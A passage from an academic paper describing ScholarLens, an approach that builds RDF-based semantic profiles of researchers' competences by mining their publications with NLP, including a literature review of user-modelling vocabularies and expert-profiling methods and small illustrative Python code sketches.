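referring back to the keyword-vector representation and cosine similarity mentioned in the user profiling subsection above, a minimal sketch of the similarity computation between two weighted keyword vectors is shown below; representing the vectors as python dicts keyed by keyword is an illustrative choice, not part of the cited systems.

```python
import math

def cosine_similarity(a: dict, b: dict) -> float:
    """cosine similarity between two weighted keyword vectors,
    each given as {keyword: weight}; for non-negative weights the
    result lies in [0, 1], with 1 meaning identical direction."""
    shared = set(a) & set(b)
    dot = sum(a[k] * b[k] for k in shared)
    norm_a = math.sqrt(sum(w * w for w in a.values()))
    norm_b = math.sqrt(sum(w * w for w in b.values()))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)

# item-to-user similarity: compare a paper's term weights to a user profile
user_profile = {"semantic web": 0.8, "nlp": 0.6, "user modeling": 0.4}
paper_terms = {"nlp": 0.7, "semantic web": 0.5, "ontologies": 0.3}
print(round(cosine_similarity(user_profile, paper_terms), 3))
```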
according to the definition in hr-xml-consortium ( ), a competency is ‘‘a specific, identifiable, definable, and measurable knowledge, skill, ability and/or other deployment- related characteristic (e.g., attitude, behavior, physical ability) which a human resource may possess and which is necessary for, or material to, the performance of an activity within a specific business context’’. draganidis & mentzas ( ) further analyzed the term competency and outlined four dimensions a competence can be described along: category (generic term for a group of similar skills), competency (the description of the competence term), definition (user scenarios that illustrate this competence) and demonstrated behaviour (explanations that clarify if the desired competency has been achieved). the terms competence and competency are usually used synonymously. however, teodorescu ( ) argues that there is a subtle difference in their meaning: while competency is mainly focused on the description of skills a person is supposed to possess in order to achieve a certain target, the term competence actually points to the measurement of skills to determine a certain level of expertise. while we appreciate this distinction, we consider the terms as synonymous in this article, but for the sake of consistency use the term competence. semantic publishing the emerging research domain of semantic publishing aims at making scientific knowledge accessible to both humans and machines. semantic technologies have become increasingly important in the management of research objects. they enable automated systems to understand the meaning (semantics) and infer additional knowledge from published documents and data (berners-lee & hendler, ; shadbolt, hall & berners-lee, ). essential building blocks for the creation of structured, meaningful web content are information extraction and semantic annotations. these annotations are added to documents using special markups with predefined meanings to explicitly mark their structure (e.g., different sections of an article) and semantics (e.g., a publication’s contributions, methods, or application domains) (sateli & witte, ). the semantically annotated documents can then be used in a multitude of applications, for example, in information retrieval systems, by finding specific document sections or measuring the similarity of different articles’ contributions. in recent years, the semantic publishing community increasingly built and adopted controlled vocabularies, based on semantic web technologies, for describing research objects. however, despite the promises of better knowledge access (berners-lee & hendler, ; shotton, ), the manual annotation of existing research literature is prohibitively expensive for a wide-spread adoption. consequently, a significant focus of research in the semantic publishing domain is dedicated to finding automatic approaches to annotate the wealth of existing scientific literature with shared vocabularies, based on approaches from the natural language processing and text mining domains. literature review we focus our review on two core aspects: firstly, existing semantic vocabularies that describe scholars in academic institutions with their publications and competences, in sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. order to establish semantic user profiles. and secondly, we examine existing approaches for automatic profile generation through nlp methods. 
vocabularies for scholarly user modeling in the area of user modeling, a multitude of semantic approaches have emerged in the last decade that go beyond representing users interests with keywords in favour of using concepts of domain ontologies, for example in a vector-based model (sieg, mobasher & burke, ; cantador & castells, ). in addition to providing a common understanding of domain knowledge, using semantic technologies also fosters the evolution towards more generic user models. an important goal of generic user modeling is facilitating software development and promoting reusability (kobsa, ) of profiles across applications or platforms. semantic web technologies, such as the representation of user characteristics in an rdf or web ontology language (owl) (https://www.w .org/owl/) compliant format can leverage this idea. in the following section, we review different proposals for generic user and competence modeling with semantic web vocabularies. furthermore, we discuss scholarly ontologies that describe users, institutions and publications in the scientific domain. vocabularies for competence modeling from paquette ( )’s perspective, competences are phrases that connect a user’s skills and positions to knowledge. this idea is reflected in his proposed competence ontology containing five main concepts, namely, competence statement, competence, skill, knowledge entity and resource. paquette further developed his ontology into sub-ontologies for skills and performance indicators that could be incorporated in ontology-driven e-learning systems. however, paquette’s ontology was designed to be used within his proposed software framework and is essentially missing connections to other existing ontologies. another ontology approach is proposed by fazel-zarandi & fox ( ). based on the assumption that someone who possesses appropriate skills is able to perform certain tasks, the ontology models skills at a certain level of proficiency and permits inter-linking with activities and knowledge fields. the intelleo competence ontology (jovanovic et al., ) aggregates the findings from different competence ontologies (schmidt & kunzmann, ; sandberg, ; sitthisak, gilbert & davis, ; paquette, ; sicilia, ; sampson & fytros, ) and defines a competence with respect to the corresponding domain-topic, skill and competence level. the intelleo ontology permits defining a competence as a prerequisite for another competence and provides the vocabulary for describing the process of gaining that specific skill. a competence record, hence, comprises a certain competence level, the source where the acquired competence has been achieved, as well as the date and methods that have been utilized to verify the acquisition. vocabularies for semantic user profiles gumo (heckmann et al., ) was the first generic user model approach, designed as a top-level ontology for universal use. this owl-based ontology focuses on describing a user in a situational context, offering several classes for modeling a user’s sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/owl/ http://dx.doi.org/ . /peerj-cs. personality, characteristics and interests. background knowledge and competences are considered only to a small degree. in contrast, the intelleo (http://intelleo.eu/) ontology framework is strongly focused on personalization and enables describing preferences, tasks and interests. 
the intelleo framework consists of multiple rdfs-based ontologies, including vocabularies for user and team modeling, as well as competences as we described in ‘vocabularies for competence modeling’. the intelleo vocabularies are inter-linked with other user model ontologies, such as friend of a friend (foaf) (http://www.foaf-project.org/). thanks to the simplicity and inter-linking of foaf to other linked open vocabularies (lovs), it has become very popular in recent years and is integrated in numerous personalized applications (celma, ; raad, chbeir & dipanda, ; orlandi, breslin & passant, ). foaf’s rdf-based vocabulary provides for describing basic user information with predefined entities, such as name, email, homepage, and interests, as well as modeling both individuals and groups in social networks. however, foaf does not provide comprehensive classes for describing preferences and competences, so that it would become directly usable within a scholarly application context. other ontologies aiming to unify user modeling vocabularies in semantic web applications are the scrutable user modeling infrastructure (sumi) (kyriacou, davis & tiropanis, ) and the ontology developed by golemati et al. ( ). besides general user information such as contact, address, preferences, education and profession, (golemati et al., ) also provides a vocabulary for a user’s activities in a given timeline. in contrast, sumi (kyriacou, davis & tiropanis, ) models user interests from the profiling perspective, which can be either explicitly given by the user or implicitly recorded by the system. the user model in sumi is divided into four categories. the first two categories contain the manually provided user information: (i) generic personal user data and (ii) interests that are only specific for a certain application, e.g., preferences that are only applicable within the ‘amazon.com’ platform. sumi automatically stores the recorded user preferences in two further categories: (i) generic application information that are valid across different service providers and (ii) application-specific data that is only used for a certain service. neither sumi nor golemati’s approach are inter-linked with other vocabularies, and they are also not maintained anymore. vocabularies for modeling scholars for modeling scholars in the scientific domain, vivo (http://vivoweb.org/ontology/core#) (börner et al., ) is the most prominent approach that has been used in numerous applications (http://duraspace.org/registry/vivo). it is an open source suite of web applications and ontologies used to model scholarly activities across an academic institution. however, vivo offers no support for content adaptation, due to missing classes for user interests, preferences and competences. another vocabulary modeling scientists and publications in research communities is the semantic web for research communities (swrc) (http://ontoware.org/swrc/), which was developed to provide an ontological infrastructure for semantic information portals (gonzalez & stumme, ; haase et al., ). the semantic web portal ontology (swpo) (http://sw-portal.deri.org/ontologies/swportal) uses the foaf, sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://intelleo.eu/ http://www.foaf-project.org/ http://vivoweb.org/ontology/core# http://duraspace.org/registry/vivo http://ontoware.org/swrc/ http://sw-portal.deri.org/ontologies/swportal http://dx.doi.org/ . /peerj-cs. 
table comparison of existing user model and scholarly vocabularies: high denotes that the vocabulary provides numerous classes and prop- erties for the description of that entity. medium means several classes and properties are available to define that entity and low states that there is only one class and property available. n/a indicate that this entity is not covered by the vocabulary. name coverage scientist role document research object project competence task interest vivo high high high medium low n/a n/a low lsc low n/a medium low low n/a n/a low swpo medium n/a medium n/a low n/a low low swrc medium medium medium n/a low n/a n/a n/a aiiso medium high n/a n/a low n/a n/a low foaf low n/a low n/a low n/a n/a low gumo low low n/a n/a n/a medium n/a high intelleo low low low n/a low high medium medium (http://purl.org/net/nknouf/ns/bibtex), time (http://www.wsmo.org/ontologies/ datetime#) and dcmi metadata (http://purl.org/dc/elements/ . /) vocabularies to model researchers with their personal and scholarly activities, like publications and conferences. the goal of swpo was to design a vocabulary to use within a portal application, where researchers working within a common scientific area can communicate with each other. the linked science core vocabulary (lsc) (http://linkedscience.org/lsc/ns#) provides a set of vocabularies for describing and interlinking researchers, publications and scientific data. lsc is very limited in its expressiveness and uses a small number of classes for describing research rhetoric elements in publications (e.g., hypothesis, data, method), rather than modeling researchers and their context. aiiso, the academic institution internal structure ontology (http://purl.org/vocab/aiiso/schema), is a linked open vocabulary for describing the roles people play within various internal entities of an academic institution through its integration with foaf and participation vocabularies. one of the use cases we had in mind when designing our scholarlens methodology was its application within sophisticated information filtering systems for scholars that consider a user’s research background. therefore, we explored the generic user models and scholarly ontologies reviewed above, in order to determine how well they can express features of scientific user modeling. the outcome of our study is summarized in table : scientist describes how well general user information about a scholar including name, address, affiliation, department and contact details can be defined. the ability to represent a user’s roles, e.g., a student, a post-doc or a professor, is expressed with role. document refers to all kinds of scholarly publications and research object comprises the possibility to define all different types of data used or produced in scientific workflows. a user might be involved in different research projects, which is addressed with the concept project. competence points to the possibility of characterizing a user’s expertise; whereas task covers how well a user’s responsibilities can be described. interest refers to a user’s preferences and interests for certain topics. a comprehensive description of an academic user is provided by vivo. this ontology is widely used in applications at academic institutions for representing general user sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://purl.org/net/nknouf/ns/bibtex http://www.wsmo.org/ontologies/datetime# http://www.wsmo.org/ontologies/datetime# http://purl.org/dc/elements/ . 
/ http://linkedscience.org/lsc/ns# http://purl.org/vocab/aiiso/schema http://dx.doi.org/ . /peerj-cs. information and specific research areas and background. however, it does not provide for personalization, due to missing classes for user interests and preferences. in contrast to vivo, the intelleo ontology framework is strongly focused on personalization and offers several classes for preferences, tasks and competences. the most prominent, but also most basic user model ontology is foaf, which provides only very few classes and properties for user modeling. implicit profile generation generic user modeling requires new methods for user profiling. merely observing a user’s browsing behavior is not enough for various tasks a scholar is involved in. more complex user information can be obtained from, e.g., context resources, such as affiliations a scholar is associated with, but also from content sources, for instance, a user’s publications. utilizing nlp techniques in user modeling has quite a long history (zukerman & litman, ) and has also become important in recent years in information retrieval (ir) for extracting named entities from scientific papers in order to profile scholars and to find an expert in a certain topic. therefore, in the following subsections we focus on related work in expert profiling based on publications. since social media offers an abundance of user information, we also report on implicit profiling approaches using data from social networks that are targeted at general users, rather than only scholars. expert profiling in information retrieval certain tasks in research require finding experts with adequate background knowledge and skills. this so-called expertise retrieval gained a lot of attention in the information retrieval community (balog et al., ), in particular with the expert finding task at the enterprise track of the nist ( ) competition, which leveraged the idea of finding the right person with proper competences. based on a corpus of different kinds of documents, such as web pages, source code files and emails from mailing-lists, the task was to return a ranked list of persons with appropriate background knowledge in a given domain. however, as balog & de rijke ( ) point out, just matching people and domains in isolation is not enough: expert seekers often want to retrieve context information about a scholar’s research network. the information with whom a person corresponds or collaborates might provide evidence on his or her establishment in the research community. thus, it is getting more and more important to create comprehensive expert profiles, rather than just finding experts in documents for a given topic. balog and rijke clearly distinguish between expert finding and expert profiling. according to their definition, expert finding addresses the problem of finding experts for certain topics, based on a given set of documents, while expert profiling aims at creating profiles of individuals. the main goal in expert profiling is to establish a description of a person’s competences and his or her social network. they divide the task of expert profiling into two stages: extracting topics and determining a person’s competence in that topic. here, competence is modeled as an association between query terms (topics) and candidate experts, where associations are mainly established based on textual evidence. 
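to make this notion of a textual-evidence association more concrete, the following minimal python sketch (our own illustration, not one of the retrieval models surveyed here; the corpus, author identifiers and the raw-frequency scoring are assumptions made purely for the example) ranks candidate experts for a query topic by how often that topic occurs in documents they authored.

from collections import Counter, defaultdict

# hypothetical corpus: each record links an author to the topics detected in one document
corpus = [
    {"author": "a1", "topics": ["semantic web", "ontology", "semantic web"]},
    {"author": "a1", "topics": ["text mining", "ontology"]},
    {"author": "a2", "topics": ["text mining", "information retrieval"]},
]

# association strength: how often a topic occurs across an author's documents
associations = defaultdict(Counter)
for record in corpus:
    associations[record["author"]].update(record["topics"])

def rank_experts(topic, associations):
    # rank authors by the raw frequency of `topic` in their documents
    scores = {a: c[topic] for a, c in associations.items() if c[topic] > 0}
    return sorted(scores.items(), key=lambda kv: kv[1], reverse=True)

print(rank_experts("ontology", associations))  # e.g., [('a1', 2)]

actual expertise retrieval systems replace this raw count with the probabilistic, discriminative, voting or graph-based association models summarized below.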
a simple association would be the authorship of publications, where the content of the papers are the textual evidence of the candidate’s sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. expertise: ‘‘the stronger the association between a person and a topic, the likelier it is that the person is an expert on that topic’’ (balog et al., ). different approaches have emerged in expertise retrieval for modeling these associations. according to balog et al. ( ), they can be grouped into five categories: generative probabilistic models, such as language or topic models, which determine the likelihood that a given topic is linked to a person, discriminative models computing the conditional probability that a tuple of topic and candidate expert is relevant, voting models that describe the generation of associations as a voting process, where scores from different sources are combined, graph-based models that analyze relationships among people and documents and describe associations along nodes (people and documents) and directed edges (conditions), as well as other models covering the broad spectrum of other approaches for modeling associations. as balog et al. ( ) point out, comparing all of the above mentioned approaches is a difficult task, since they are all influenced by different variables and components. furthermore, they are often built into larger applications, where only the final system was evaluated. therefore, balog et al. ( ) only analyzed the range of the best score from the main test collections: w c (http://research.microsoft.com/en-us/um/people/nickcr/w c- summary.html) and cerc (http://es.csiro.au/cerc/) (both from trec) and the uvt expert collection (http://ilps.science.uva.nl/resources/tu-expert-collection/) which is a collection of public data from about , experts from uvt. the mean average precision (map) scores in the w c collection varies between . and . on a query set from and between . and . on the dataset from the trec competition. it needs to be considered that in this trec collection, no actual ‘relevance assessment’ has been made, as the membership of the w c people in different working groups was used to derive that a person has expertise in a certain topic. the map values from the cerc collection range from . to . , whereas the map values for the expert profiling task on the uvt collection varies between . and . . in the uvt collection, the ground truth was explicitly given by the users, as they provide a description of their research areas together with keywords from a topic hierarchy. another notable example for an expertise retrieval system is aminer (https://aminer.org) (tang et al., ), a system that combines user profiling and document retrieval techniques. general user information, such as affiliation and position, as well as research interests and research networks are presented in textual and visual form. the profiling approach consists of three main steps: profile extraction, author name disambiguation and user interest discovery. profile extraction points to collecting general user information from web pages. given a scholar’s name, a binary classifier selects web pages according to features, like a person’s name appearing in a page title. all retrieved pages are tagged with categories that are used to generate profile properties, including affiliation, email, address and phone numbers. 
extracting research interests are left out in this step, since not all scholars enumerate their interests on their web pages. in addition, research interests should be proved by textual evidence. in a second step, aminer attempts to link documents with the basic user profiles, in order to obtain a list of a scholar’s publications. in this step, aminer uses publications from different online digital libraries, e.g., dblp or acm. to solve the name disambiguation problem (i.e., two scholars with the same name), they sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://research.microsoft.com/en-us/um/people/nickcr/w c-summary.html http://research.microsoft.com/en-us/um/people/nickcr/w c-summary.html http://es.csiro.au/cerc/ http://ilps.science.uva.nl/resources/tu-expert-collection/ https://aminer.org http://dx.doi.org/ . /peerj-cs. developed a probabilistic model based on author names. in the final step, they determine user interests from the generated linked list of papers. interests are described based on the detected topics. a topic consists of a mixture of words and probabilities being associated with that word. they propose a probabilistic model called author-conference-topic (act) model, where ‘conference’ comprises all kinds of publications, namely journals, conferences and articles. the idea behind this approach is that an author writing a paper uses different words based on her research interests, which denote the topic distribution. the discovered topic distributions are used as research interests and are stored together with the general information in an extended foaf format, in what they call a researcher network knowledge base (rnkb). for the evaluation, they utilized pooled relevance judgments (buckley & voorhees, ) and human judgments. seven people rated the retrieved expert lists for topic queries along four expertise levels: definite expertise, expertise, marginal expertise and no expertise. the judges were taught to do the rating according to a guideline following certain criteria, such as how many publication the retrieved scholar actually has for the given topic or how many awards she has received or conferences attended. in a final step, the judgment scores were averaged. in their experiments, they tested different language models along with their act model, which was shown to outperform the other models in the best run (p@ : . %, p@ : . %, map: %). expert profiling using text mining generating scholarly profiles has not only been investigated in information retrieval, but also in the computational linguistics domain. a first expert profiling approach using linked open data is suggested by buitelaar & eigner ( ). they define simple linguistic patterns to identify competences in a user’s research publications. bordea & buitelaar ( b) further developed that idea using a gate pipeline (bordea & buitelaar, a) that finds pre-defined skill types in research papers. they define skill types as general domain words that represent theoretical and practical expertise, such as method, algorithm or analysis. additionally, they applied an adapted td-idf filtering algorithm and removed terms from the final list that were considered too broad. in bordea et al. ( ), they extended their system with semantic linking to dbpedia ontology concepts (http://wiki.dbpedia.org/services-resources/ontology) and attempt to find a corresponding concept in the linked open data cloud for each extracted topic. 
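the tf-idf-style filtering of overly broad skill terms described above can be sketched in a few lines of python; this is a generic illustration under our own assumptions (the candidate phrases, document names and the zero-idf cut-off are invented for the example) and not the actual gate pipeline of bordea and colleagues.

import math
from collections import Counter

# hypothetical candidate skill phrases extracted per document
docs = {
    "paper1": ["topic model", "analysis", "gibbs sampling", "analysis"],
    "paper2": ["analysis", "dependency parsing", "topic model"],
    "paper3": ["analysis", "named entity recognition"],
}

def tfidf_scores(docs):
    # score each (document, term) pair by tf-idf
    n = len(docs)
    df = Counter(term for terms in docs.values() for term in set(terms))
    scores = {}
    for doc, terms in docs.items():
        tf = Counter(terms)
        for term, freq in tf.items():
            scores[(doc, term)] = (freq / len(terms)) * math.log(n / df[term])
    return scores

scores = tfidf_scores(docs)
# terms with zero idf (they occur in every document) score 0 everywhere and are dropped as too broad
broad = {term for (_, term), s in scores.items() if s == 0.0}
print(broad)  # {'analysis'}

a phrase like 'analysis' that occurs in every document receives an idf of zero and is filtered out as too broad, while rarer, more specific phrases are kept.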
for the evaluation, they conducted a user study with three domain experts, using their own corpus. the users were asked to judge a limited list of ranked topics for a given domain. the list was divided into three sections, top, middle and bottom, and the judges classified the provided topics into good, bad or undecided. finally, the kappa statistic was applied to aggregate the three judgments. overall, % of the top ranked topics were marked as good. according to recent findings letierce et al. ( ), social media platforms are widely used among scientists to share research news. nishioka & scherp ( ) generated scholarly profiles out of social media items, namely twitter (http://www.twitter.com), for recommending scientific publications. they examine different factors influencing the recommendation process, such as profiling method, temporal decay (sliding window and exponential decay) and richness of content (full-text and title versus title only). regarding sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://wiki.dbpedia.org/services-resources/ontology http://www.twitter.com http://dx.doi.org/ . /peerj-cs. the profiling method, they took into account the following filtering methods: cf-idf, an adapted tf-idf algorithm using concepts of ontologies instead of full-text terms, hcf-idf, their own extended hierarchical approach and latent dirichlet allocation (lda) (blei, ng & jordan, ) topic modeling. for both user tweets and publications, they extract concepts with corresponding labels in the underlying knowledge base through gazetteers. by means of the stanford core nlp (http://stanfordnlp.github.io/corenlp/) tools, they remove stop words and twitter hashtags. in their evaluation with participants and around , scientific publications from economics, they analyzed in total different recommendation strategies, derived as combinations from the three influencing factors and their sub-factors. the participants obtained the top- recommendations for each of the strategies and rated the presented publication list on a binary scale. their results reveal that the most effective strategy was the one with the cf-idf filtering, the sliding window, and with full-texts and titles. additionally, it turned out that using titles only in combination with the hcf-idf filtering produces similarly good recommendations. implicit profiling in social media in the last decade, using social media platforms for implicit user profile generation attracted increasing attention (szomszor et al., ; abel et al., ; stankovic, rowe & laublet, ). through a number of different nlp methods, ‘interesting’ topics are extracted from short messages or social network posts. linkedvis (bostandjiev, o’donovan & höllerer, ) for instance is an interactive recommender system that generates career recommendations and supports users in finding potentially interesting companies and specific roles. linkedvis developers designed four different user models based on data from linkedin (https://www.linkedin.com) and extract interests and preferences from a user’s connections, roles and companies. two of the four constructed profiles contained meaningful entities instead of plain keywords. a part-of-speech tagger was utilized to find noun phrases that were mapped to wikipedia articles. the evaluation with a leave-one-out cross-validation revealed that the user models with semantic enrichment produced more accurate and diverse recommendations than the profiles based on tf-idf weights and occurrence matching. 
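the concept-based profiling used in the approaches above can be illustrated with a small python sketch: surface forms in short texts are looked up in a gazetteer and counted as knowledge-base concepts rather than raw terms. the gazetteer entries, uris and example posts below are hypothetical, and a real system would add sense disambiguation and cf-idf-style weighting on top of the raw counts.

from collections import Counter

# toy gazetteer mapping surface forms to knowledge-base concepts (example uris only)
GAZETTEER = {
    "linked data": "http://dbpedia.org/resource/Linked_data",
    "lod": "http://dbpedia.org/resource/Linked_data",
    "topic model": "http://dbpedia.org/resource/Topic_model",
}

def concept_profile(posts):
    # build a concept-frequency profile from short texts via gazetteer lookup
    profile = Counter()
    for text in posts:
        text = text.lower()
        for surface, uri in GAZETTEER.items():
            if surface in text:
                profile[uri] += text.count(surface)
    return profile

posts = ["Playing with Linked Data and LOD cloud datasets",
         "New topic model for short texts"]
print(concept_profile(posts).most_common())

note that two different surface forms ('linked data' and 'lod') are counted towards the same concept, which is exactly what distinguishes concept-based weighting from plain term counting.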
another approach using nlp methods for online profile resolution is proposed by cortis et al. ( ): they developed a system for analyzing user profiles from heterogenous online resources in order to aggregate them into one unique profile. for this task, they used gate’s annie (https://gate.ac.uk/sale/tao/splitch .html) plugin (cunningham et al., ) and adapted its jape grammar rules to disassemble a person’s name into five sub-entities, namely, prefix, suffix, first name, middle name and surname. in addition, a large knowledge base (lkb) gazetteer was incorporated to extract supplementary city and country values from dbpedia (http://dbpedia.org). in their approach, location-related attributes (e.g., ‘dublin’ and ‘ireland’) could be linked to each other based on these semantic extensions, where a string-matching approach would have failed. in their user evaluation, the participants were asked to assess their merged profile on a binary rating scale. more than % of the produced profile entries were marked as correct. the results sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://stanfordnlp.github.io/corenlp/ https://www.linkedin.com https://gate.ac.uk/sale/tao/splitch .html http://dbpedia.org http://dx.doi.org/ . /peerj-cs. reveal that profile matchers can improve the management of one’s personal information across different social networks and support recommendations of possibly interesting new contacts based on similar preferences. discussion as presented above, automatic user profiling approaches using linked named entities and nlp techniques are becoming increasingly popular. sources for generating profiles vary from scientific papers to social media items, profiles in social networks or an aggregation of different sources. in particular, expert profiling has evolved into its own research area. however, the most widespread description of a user model in these applications is still a term-based vector representation. even though keywords are increasingly replaced by linked entities, they still lack an underlying semantic model in rdf or owl format. in contrast, we aim at automatically creating semantic user profiles for scholars by means of nlp methods and semantic web technologies. our goal is to establish user profiles in an interoperable rdf format that can be stored in a triplestore. hosting user information in such a structured and meaningful semantic format facilitates data integration across different sources. furthermore, expressive sparql queries and inferences can help to discover related preferences that are not explicitly stated in the profiles. the open, shared knowledge base constructed by our approach can then be accessed by a multitude of different scholarly applications. design modeling semantic scholarly profiles requires a formalization of the relations between authors and their competences in a semantically rich format. the three central concepts in our model are researchers, their competence topics and a set of scholarly documents. we hypothesize that authors of a scholarly publication (e.g., a journal article) are competent in topics mentioned in the article to various degrees. this way, for each author (i.e., researcher with at least one publication) we create a semantic user profile. with the ultimate goal of creating machine-readable, inter-operable profiles, we decided to use the w c standard resource description framework (rdf) to design profiles based on semantic triples. 
semantic modeling of user competence records every entity in our model is defined as a semantic triple 〈s,p,o〉, where s is a unique resource identifier (uri) within the knowledge base, p is a property from a set of pre-defined relations between authors and their profile elements, and o is either a unique identifier of an entity (in the knowledge base or an external dataset), or a literal value. all users in our model are instances of the user model ontology (um) (http: //intelleo.eu/ontologies/user-model/spec/) user class, designed specifically for modeling users in collaborative contexts. as a subclass of the foaf person class, all user instances inherit attributes and relations from the foaf vocabulary. since our primary source of competence detection are the users’ publications, we also need to semantically model the documents and their content. for a user u, we denote du ={d ,d ,...,dn} as a set of documents published by the user. each document d contains a set of topics sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://intelleo.eu/ontologies/user-model/spec/ http://intelleo.eu/ontologies/user-model/spec/ http://dx.doi.org/ . /peerj-cs. td ={t ,t ,...,tn}, where each ti is essentially a named entity (ne), like ‘text mining’ or ‘automatic reasoning’ within the document’s sentences. topics are often repeated many times in a document. thus, we need to be able to annotate where a topic is mentioned in a document. every topic t will then have two attributes: a start and end offset, containing the index of their first and last character in the document. this way, every mention of a competence topic found in a document is modeled as a semantic triple and we can count the frequency of the competence topics mentioned in each document, as well as overall for each user profile. the challenge here is to identify various orthographic forms of the same topic in a document, so that we can determine the unique topics in t . for instance, topic ‘linked open data’ may be mentioned in the abstract of a document and then later on ‘lod’ may appear in the background section. this results in two triples, each describing the two competence topics with different forms in text, although, in fact they represent the same concept. as a solution, each mention of topic t will be the subject of an additional triple 〈t,rdfs : isdefinedby,l〉, where l is the uri of a resource, where the topic (concept) is defined in a given knowledge base or dataset. unique topics with different surface forms in the document can now be identified through their resource uri. in our model, users and their competence topics are inter-connected through competence records. a competence record contains the provenance metadata of a user’s competences (e.g., the document identifier in which it was found) and can be additionally associated with a level of expertise. finally, we define a user profile as a labeled, directed graph pu =(v ,e), where v={d∪t} and e is a set of edges between a user’s publications and their encompassed topics, as well as outgoing links from the t elements to lod resources. since rdf documents intrinsically represent labeled, directed graphs, the semantic profiles of scholars extracted from the documents can be merged through common competence uris—in other words, authors extracted from otherwise disparate documents can be semantically related using their competence topics. 
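a minimal sketch of this model, written with the python rdflib library, may help to illustrate how a single competence mention is recorded as triples. the instance uris, the offset values and the exact casing of the vocabulary class and property names are assumptions made for the example; the vocabularies themselves are listed in the table that follows.

from rdflib import Graph, Namespace, URIRef, Literal, RDF, RDFS

# namespaces as used in our profile model (see the vocabulary table below)
UM = Namespace("http://intelleo.eu/ontologies/user-model/ns/")
C  = Namespace("http://intelleo.eu/ontologies/competences/ns/")
OA = Namespace("http://www.w3.org/ns/oa/")
EX = Namespace("http://example.org/")  # hypothetical instance namespace

g = Graph()
author     = EX["author1"]
record     = EX["competenceRecord1"]
competence = EX["competence1"]

# the author is a user who has a competence record
g.add((author, RDF.type, UM.User))
g.add((author, UM.hasCompetencyRecord, record))

# the record points to a competence topic grounded to an LOD resource
g.add((record, C.competenceFor, competence))
g.add((competence, RDF.type, C.Competence))  # class name assumed
g.add((competence, RDFS.isDefinedBy,
       URIRef("http://dbpedia.org/resource/Linked_data")))

# example start/end offsets of the topic's mention in the source document
g.add((competence, OA.start, Literal(184)))
g.add((competence, OA.end, Literal(195)))

print(g.serialize(format="turtle"))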
following the best practices of producing linked open datasets, we tried to reuse existing linked open vocabularies (lovs) to the extent possible for modeling the semantic user profiles. the table below shows the vocabularies used to model our semantic scholar profiles and their respective selected terms. we largely reuse intelleo (http://www.intelleo.eu/) ontologies for competence modeling—originally designed for semantic modeling of learning contexts—in particular the vocabularies for user and team modeling (http://intelleo.eu/ontologies/user-model/spec) and competence management (http://www.intelleo.eu/ontologies/competences/spec). we also reuse the pubo ontology (sateli & witte, ) for modeling the relations between the documents that we process, the generated annotations and their inter-relationships.

table modeling user profiles with linked open vocabularies (lovs): this table shows the terms selected from various vocabularies and their corresponding concept in the semantic user profiles. the vocabulary namespaces used in the table can be de-referenced using the urls shown in the notes.

lov term               | modeled concept
um:user                | scholarly users, who are the documents' authors.
um:hascompetencyrecord | a property to keep track of a user's competence (level, source, etc.).
c:competency           | extracted topics (lod resources) from documents.
c:competencefor        | a relation between a competence record and the competence topic.
sro:rhetoricalelement  | a sentence containing a rhetorical entity, e.g., a contribution.
cnt:chars              | a competence's label (surface form) as it appeared in a document.
pubo:hasannotation     | a property to relate annotations to documents.
pubo:containsne        | a property to relate rhetorical zones and entities in a document.
oa:start & oa:end      | properties to show the start/end offsets of competences in a text.

notes. um, http://intelleo.eu/ontologies/user-model/ns/; c, http://intelleo.eu/ontologies/competences/ns/; sro, http://salt.semanticauthoring.org/ontologies/sro#; cnt, http://www.w3.org/2011/content#; pubo, http://lod.semanticsoftware.info/pubo/pubo#; oa, http://www.w3.org/ns/oa/; rdf, http://www.w3.org/1999/02/22-rdf-syntax-ns#; rdfs, http://www.w3.org/2000/01/rdf-schema#.

the figure below shows a minimal example semantic profile in form of an rdf graph.

figure: the rdf graph shown in this picture represents a semantic user profile that illustrates the relations between an author and the topics mentioned in her article (an um:user is connected via um:hascompetencyrecord and c:competencefor to a competence topic such as dbpedia:software_prototyping, which is in turn linked through pubo:hasannotation and pubo:containsne to the document and the contribution sentence in which it was found).

automatic detection of competences

in this section, we describe our automatic workflow for constructing semantic scholarly profiles. we first enumerate the requirements of such a workflow and then present the various components of our scholarlens approach that satisfy these requirements. an overview of our system architecture is illustrated in the figure below.
figure: the workflow shown here depicts how scientific literature undergoes various syntactical and semantic processing steps. the output of the workflow is a knowledge base populated with semantic user profiles, inter-linked with resources on the linked open data cloud. (pipeline stages shown in the figure: syntactical processing with an english tokenizer, sentence splitter, part-of-speech tagger, noun phrase chunker and lemmatizer; semantic analysis with a gazetteer, rule transducers and named entity linking against the linked open data cloud; and an export stage in which an annotation-to-triple converter writes the semantic triples to the knowledge base.)

requirements

our goal is to automatically populate semantic user profiles by mining the users' publications for competence topics. therefore, we identify the following requirements for our workflow:

requirement 1: access to scholarly articles' full-text. the workflow should be able to accept a set of documents written by an author as input, which may be in various publisher-dependent formatting styles. the documents must be machine-readable, that is, the workflow must have access to the textual content of the entire article.

requirement 2: automatic extraction of domain topics. in order to extract the competence topics, we need to annotate the named entities (nes) in a document that represent relevant concepts for a domain. for example, words like 'benchmarking' and 'linear regression' represent relevant research activities and concepts in a computer science article.

requirement 3: semantic representation of extracted information. the extracted information from documents must be stored in a machine-readable and inter-operable format, in order to facilitate the implementation of value-added services, like expertise recommendation. the users, their publications and the competence topics must be uniquely identifiable in the output. all instances and their attributes must be represented using semantic web vocabularies.

text mining documents for competence topics

